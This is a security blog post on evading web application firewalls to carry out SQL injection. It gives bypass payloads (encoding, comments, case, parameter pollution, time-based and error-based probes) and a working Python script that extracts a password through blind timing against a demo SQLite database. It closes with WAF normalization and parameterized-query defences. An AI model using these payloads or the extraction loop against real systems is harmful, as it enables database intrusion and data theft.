Blog | G5 Cyber Security

SQL Injection WAF Bypass

TL;DR

Web Application Firewalls (WAFs) try to stop SQL injection attacks. This guide shows common ways attackers bypass these protections, and how to defend against them.

1. Understand the WAF

Before bypassing a WAF, know what you’re up against. Common types include:

Tools like Burp Suite can help identify the WAF vendor and ruleset: vendor-specific block pages, response headers and cookie names, and which probe requests get blocked are the usual fingerprints.

2. Basic Bypass Techniques

  1. Case Variation: SQL keywords are case-insensitive, but a rule that matches the literal string SELECT is not. Try SeLeCt instead of SELECT.
  2. Whitespace Variations: A rule that expects a plain space between tokens can be evaded with any other separator the parser accepts: tab (%09), newline (%0a), carriage return (%0d), and in MySQL also %0b, %0c and %a0.
    SELECT%0a1%09FROM%0dusers;
  3. Comments: The parser treats an inline comment as whitespace, so comments can replace the spaces between tokens. They cannot be placed inside a keyword: SEL/**/ECT parses as the two tokens SEL and ECT, not as SELECT. MySQL additionally executes the contents of version comments, which many rules skip over as comment text.
    SELECT/**/1/**/FROM/**/users;
    /*!SELECT*/ 1 FROM users;
  4. URL Encoding: Encode characters like spaces and quotes. The web server decodes them before the application builds the query, so a rule that only matches the raw bytes misses them.
    %20 for space, %27 for single quote.

3. Character Encoding Bypass

WAFs often struggle with different character encodings.

  1. Double Encoding: Encode a character twice, for example a single quote as %2527 instead of %27. A WAF that decodes the request once sees the harmless text %27, while an application that decodes a second time receives the quote. This only works when something really does decode twice (a second urldecode call in the application, or a proxy in front of it that decodes once).
  2. Unicode Encoding: Use Unicode representations of characters. Some servers (historically IIS) accept %uXXXX escapes that many WAF decoders do not understand.
    SELECT%u00201 FROM users;
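
The following is an added example, not code from the original post, covering the evasions of sections 2 and 3 together. It simulates two hypothetical WAF rules in Python: a naive one that matches the literal text UNION SELECT after a single URL-decode, and a hardened one that first normalizes the parameter (repeated decoding, comment stripping, whitespace collapsing, case folding) the way a real engine's transformation chain does. The payloads are constructed sample values, and the rules and function names are illustrative, not any vendor's.

```python
import re
from urllib.parse import unquote

# Constructed sample parameter values: the plain payload and the section 2/3 evasions of it.
PAYLOADS = {
    "plain":          "1' UNION SELECT username, password FROM users--",
    "case":           "1' uNiOn SeLeCt username, password FROM users--",
    "whitespace":     "1'%0aUNION%09SELECT%0dusername,%0apassword%09FROM%0dusers--",
    "comment":        "1'/**/UNION/**/SELECT/**/username,password/**/FROM/**/users--",
    "double_encoded": "1%2527%2520UNION%2520SELECT%2520username,%2520password%2520FROM%2520users--",
}

# Hypothetical naive rule: the literal, single-spaced, upper-case pattern.
NAIVE_RULE = re.compile(r"UNION SELECT")


def naive_waf_blocks(raw_param: str) -> bool:
    """Decode the parameter once, then look for the literal rule text."""
    return NAIVE_RULE.search(unquote(raw_param)) is not None


def normalize(raw_param: str, max_rounds: int = 3) -> str:
    """Undo the evasions before matching: URL-decode until the value stops changing,
    keep the contents of MySQL version comments (/*! ... */ executes), treat other
    inline comments as whitespace, collapse whitespace runs, and fold case."""
    s = raw_param
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    s = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", s, flags=re.S)   # /*!50000SELECT*/ -> SELECT
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)             # /**/ behaves like a space
    s = re.sub(r"[\s\x0b\x0c\xa0]+", " ", s)                 # tab, CR/LF, VT, FF, NBSP -> space
    return s.lower()


# Rule applied to the normalized value; tolerates ALL/DISTINCT between the keywords.
HARDENED_RULE = re.compile(r"union\s+(all\s+|distinct\s+)?select")


def hardened_waf_blocks(raw_param: str) -> bool:
    return HARDENED_RULE.search(normalize(raw_param)) is not None


def evaluate(waf) -> dict:
    """Map each sample payload name to whether the given WAF function blocks it."""
    return {name: waf(value) for name, value in PAYLOADS.items()}


if __name__ == "__main__":
    for label, waf in (("naive", naive_waf_blocks), ("hardened", hardened_waf_blocks)):
        print(label, evaluate(waf))
```

The naive rule only catches the plain payload; the hardened rule catches all five because it matches what the database will actually see rather than what the attacker sent. This mirrors the transformation chain a real engine applies before its rules (ModSecurity's t:urlDecodeUni, t:removeComments, t:compressWhitespace and t:lowercase, for example). The caveat practitioners should keep in mind is that any normalization that disagrees with the backend parser is a bypass in waiting: the version-comment handling above is right for MySQL and wrong for databases that treat /*! ... */ as an ordinary comment.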

4. Keyword Obfuscation

Hide keywords from the WAF.

  1. Concatenation: Split strings into smaller parts. This hides string values (a table name, or a statement handed to dynamic SQL), not bare keywords: CONCAT('SEL','ECT') evaluates to the string 'SELECT', which only becomes a statement if something executes it, such as EXEC() in SQL Server or PREPARE/EXECUTE in MySQL.
    CONCAT('SEL','ECT')
  2. String Functions: Use functions like SUBSTRING() or REPLACE() to rebuild strings at runtime for the same purpose.
  3. Character Codes: Represent characters by their code so the literal never appears in the request.
    SELECT%20CHAR(49) FROM users;

    (49 is the decimal ASCII code for '1'; CHAR(0x31) is the hexadecimal form)

5. Using Alternative SQL Syntax

Some databases support different syntax that might bypass WAF rules.

  1. Hexadecimal Literals: Use hexadecimal representations of strings. In MySQL a hex literal used in string context is the string it encodes, so the payload needs no quotes.
    SELECT 0x41 FROM users;

    ('A' in hex; in SQL Server 0x41 is a varbinary value instead)

  2. Different Join Types: Try RIGHT JOIN or FULL OUTER JOIN instead of just JOIN, and in general any equivalent of a blocked construct (UNION ALL SELECT or UNION DISTINCT SELECT when UNION SELECT is blocked), so the rule's exact pattern never appears.

6. Time-Based Blind SQL Injection

If direct output is blocked, use time delays. The injected condition decides whether the database pauses, so the response time is the only channel needed. In an injection point the expressions below are wrapped into the existing query, for example ' AND SLEEP(5)-- - for MySQL.

  1. MySQL:
    SELECT IF(1=1, SLEEP(5), 0);
  2. PostgreSQL:
    SELECT pg_sleep(5);
  3. SQL Server:
    WAITFOR DELAY '0:0:5';
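
As an added example (not from the original post), here is the complete time-based extraction loop the section describes, in Python against a constructed in-memory SQLite backend. SQLite has no SLEEP(), so the example registers a Python function under that name to stand in for MySQL's SLEEP(); the table, the secret value, the deliberately vulnerable lookup() and the short delay are all constructed for the demo.

```python
import sqlite3
import time

DELAY = 0.05   # seconds the injected SLEEP() pauses; kept small so the demo finishes quickly


def build_vulnerable_app():
    """Constructed demo backend: an in-memory SQLite database with a SLEEP() function
    registered (mimicking MySQL's SLEEP()), and a lookup that concatenates user
    input into the SQL text, which is the injection point."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("SLEEP", 1, lambda secs: time.sleep(secs) or 1)
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'Hunter2!')")   # constructed secret

    def lookup(user_id: str):
        # Deliberately vulnerable: the value is spliced into the query string.
        sql = "SELECT username FROM users WHERE id='" + user_id + "'"
        return conn.execute(sql).fetchall()

    return lookup


def takes_long(lookup, payload: str) -> bool:
    """The blind oracle: the only signal is whether the request took at least
    half the injected delay. Errors are swallowed, as a real app would hide them."""
    start = time.perf_counter()
    try:
        lookup(payload)
    except sqlite3.Error:
        pass
    return time.perf_counter() - start >= DELAY / 2


def extract_secret(lookup, username: str, max_len: int = 32) -> str:
    """Recover users.password for `username` one character at a time, binary-searching
    the code point of each character with a conditional SLEEP()."""
    secret = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127                       # ASCII; widen the range for other alphabets
        while lo < hi:
            mid = (lo + hi) // 2
            # True branch pauses; false branch (and NULL past the end of the string) does not.
            payload = (
                f"1' AND (SELECT CASE WHEN unicode(substr(password,{pos},1))>{mid} "
                f"THEN SLEEP({DELAY}) ELSE 0 END FROM users WHERE username='{username}')--"
            )
            if takes_long(lookup, payload):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:                            # substr() past the end: no character left
            break
        secret += chr(lo)
    return secret


if __name__ == "__main__":
    app = build_vulnerable_app()
    print(extract_secret(app, "admin"))
```

Each character costs about seven requests, of which roughly half carry the delay, so the 8-character secret above takes a few seconds at DELAY = 0.05. Against a real target the delay has to be large enough to stand out from network jitter, and repeating each probe and taking the median makes the oracle far more reliable than a single measurement.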

7. Error-Based SQL Injection

Force the database to generate an error that reveals information. This only helps when the application returns the error text, or at least a distinguishable error page, to the client.

  1. Invalid Functions: Calling a function that does not exist in the target database returns an error naming the function or the database product, which fingerprints the backend.
  2. Division by Zero: Raises an error in SQL Server and PostgreSQL; MySQL returns NULL (with a warning) in its default sql_mode, so it is not a reliable oracle there.
    SELECT 1/0;

8. WAF Evasion with HTTP Parameter Pollution (HPP)

Send multiple parameters with the same name. The WAF might only inspect one occurrence, while the application uses another. Which occurrence the application sees depends on the platform: PHP keeps the last value, a Java servlet's getParameter() returns the first, and ASP.NET joins all values with commas.

  1. Example:
    ?id=1&id=2' OR '1'='1
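
As an added example, not part of the original post, the following Python models the three platform behaviours just described on the page's own query string and shows the mismatch a hypothetical WAF that scans only the first occurrence would create. The query string, the signature and the vulnerable build_sql() are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Constructed query string from the page's example: two `id` parameters, the second carrying the payload.
QUERY = "id=1&id=2' OR '1'='1"

# Hypothetical WAF signature for the tautology in the payload.
PAYLOAD_RULE = re.compile(r"'\s*or\s*'", re.IGNORECASE)


def occurrences(query: str, name: str) -> list:
    """All values sent for `name`, in order (parse_qsl keeps duplicates)."""
    return [v for k, v in parse_qsl(query, keep_blank_values=True) if k == name]


def first_value(query, name):
    """Java servlet behaviour: getParameter() returns the first occurrence."""
    values = occurrences(query, name)
    return values[0] if values else None


def last_value(query, name):
    """PHP behaviour: $_GET keeps the last occurrence."""
    values = occurrences(query, name)
    return values[-1] if values else None


def joined_value(query, name):
    """ASP.NET behaviour: Request.QueryString joins all occurrences with commas."""
    values = occurrences(query, name)
    return ",".join(values) if values else None


def waf_inspects_first_only(query, name) -> bool:
    """Hypothetical WAF flaw: only the first occurrence of each parameter is scanned."""
    value = first_value(query, name)
    return value is not None and PAYLOAD_RULE.search(value) is not None


def build_sql(value: str) -> str:
    """The vulnerable application's query (string concatenation, for illustration only)."""
    return "SELECT * FROM items WHERE id='" + value + "'"


def outcome(query: str, name: str) -> dict:
    """For each platform style: the SQL the application would build, and whether the WAF blocked the request."""
    return {
        "blocked_by_waf": waf_inspects_first_only(query, name),
        "servlet_sql": build_sql(first_value(query, name)),
        "php_sql": build_sql(last_value(query, name)),
        "aspnet_sql": build_sql(joined_value(query, name)),
    }


if __name__ == "__main__":
    for key, value in outcome(QUERY, "id").items():
        print(f"{key}: {value}")
```

The request passes the first-occurrence check, yet the PHP-style and ASP.NET-style applications both build a query containing the tautology. The servlet-style application is the only one that is safe here, and only by accident of which occurrence it picked, which is why the fix is to inspect every occurrence (or reject duplicates) rather than to rely on the platform's choice.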

9. Defending Against SQL Injection
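
Every technique above targets the WAF, not the vulnerability, so the defence that actually closes it is to keep user input out of the SQL text: parameterized queries (prepared statements) bind input as values, which no amount of encoding can turn back into syntax. The following added example, written for this page rather than taken from the original post, shows the vulnerable lookup beside its parameterized form on a constructed SQLite table, plus the allow-list needed for the one thing parameters cannot bind, an identifier such as an ORDER BY column.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed demo table so the example runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (username, role) VALUES (?, ?)",
        [("alice", "user"), ("bob", "user"), ("admin", "admin")],
    )
    return conn


def find_user_vulnerable(conn, username: str) -> list:
    # The input becomes part of the SQL text, so a quote in it changes the query's structure.
    sql = "SELECT username FROM users WHERE username = '" + username + "'"
    return [row[0] for row in conn.execute(sql)]


def find_user_safe(conn, username: str) -> list:
    # The statement's structure is fixed; the input is bound as a value and can only ever be data.
    sql = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (username,))]


# Parameters bind values, not identifiers: a column name for ORDER BY cannot be a `?`,
# so it is checked against an allow-list instead of being concatenated.
ORDERABLE_COLUMNS = {"id", "username", "role"}


def list_users_ordered(conn, column: str) -> list:
    if column not in ORDERABLE_COLUMNS:
        raise ValueError("unsupported sort column: %r" % column)
    return [row[0] for row in conn.execute("SELECT username FROM users ORDER BY " + column)]


if __name__ == "__main__":
    db = make_db()
    payload = "' OR '1'='1"
    print("vulnerable:", find_user_vulnerable(db, payload))   # every row comes back
    print("safe:      ", find_user_safe(db, payload))         # no user has that literal name
```

With the payload ' OR '1'='1 the concatenated query returns every user, while the parameterized one returns nothing because it looks for a user literally named ' OR '1'='1. A WAF still has a place in front of this code as defence in depth and as a detection point, but it is not the control that makes the application safe.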
